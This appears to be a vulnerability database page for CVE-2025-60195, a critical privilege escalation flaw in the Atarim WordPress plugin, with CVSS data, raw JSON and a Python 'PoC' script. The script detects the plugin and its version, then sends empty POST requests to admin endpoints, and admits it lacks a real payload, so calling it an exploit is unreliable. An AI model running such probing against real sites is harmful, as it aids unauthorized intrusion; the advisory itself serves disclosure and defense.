Security Vulnerability Report
中文
CVE-2025-60195 CVSS 9.8 CRITICAL

CVE-2025-60195

Published: 2025-11-06 16:16:05
Last Modified: 2026-04-15 00:35:42

Description

Incorrect Privilege Assignment vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Privilege Escalation.This issue affects Atarim: from n/a through <= 4.2.1.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Atarim Visual Collaboration <= 4.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-60195 PoC - Atarim Visual Collaboration Privilege Escalation # Target: WordPress site with Atarim plugin <= 4.2.1 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-60195 """ # Check if Atarim plugin is installed plugin_paths = [ '/wp-content/plugins/atarim-visual-collaboration/', '/wp-content/plugins/atarim/', ] for path in plugin_paths: url = target_url.rstrip('/') + path try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f'[+] Atarim plugin found at: {url}') # Check version readme_url = url + 'readme.txt' resp = requests.get(readme_url, timeout=10, verify=False) if 'Stable tag:' in resp.text: for line in resp.text.split('\n'): if 'Stable tag:' in line: version = line.split(':')[1].strip() print(f'[+] Detected version: {version}') return True except Exception as e: print(f'[-] Error: {e}') return False def exploit_privilege_escalation(target_url): """ Exploit CVE-2025-60195 - Privilege Escalation Note: Specific exploitation requires further analysis of the vulnerable endpoint """ # Vulnerable endpoint pattern (requires verification) endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/users', ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Attempt to access privileged functionality headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', } try: # This is a template - actual exploitation needs specific payload response = requests.post(url, headers=headers, timeout=10, verify=False) print(f'[*] Testing endpoint: {url}') print(f'[*] Response status: {response.status_code}') except Exception as e: print(f'[-] Error testing {url}: {e}') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-60195.py <target_url>') print('Example: python cve-2025-60195.py http://example.com') sys.exit(1) target = sys.argv[1] print(f'[*] Scanning target: {target}') if check_vulnerability(target): print('[!] Target appears to be running Atarim plugin') print('[*] Proceeding with exploitation...') exploit_privilege_escalation(target) else: print('[-] Atarim plugin not found or target not accessible')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60195", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:04.653", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Privilege Escalation.This issue affects Atarim: from n/a through <= 4.2.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}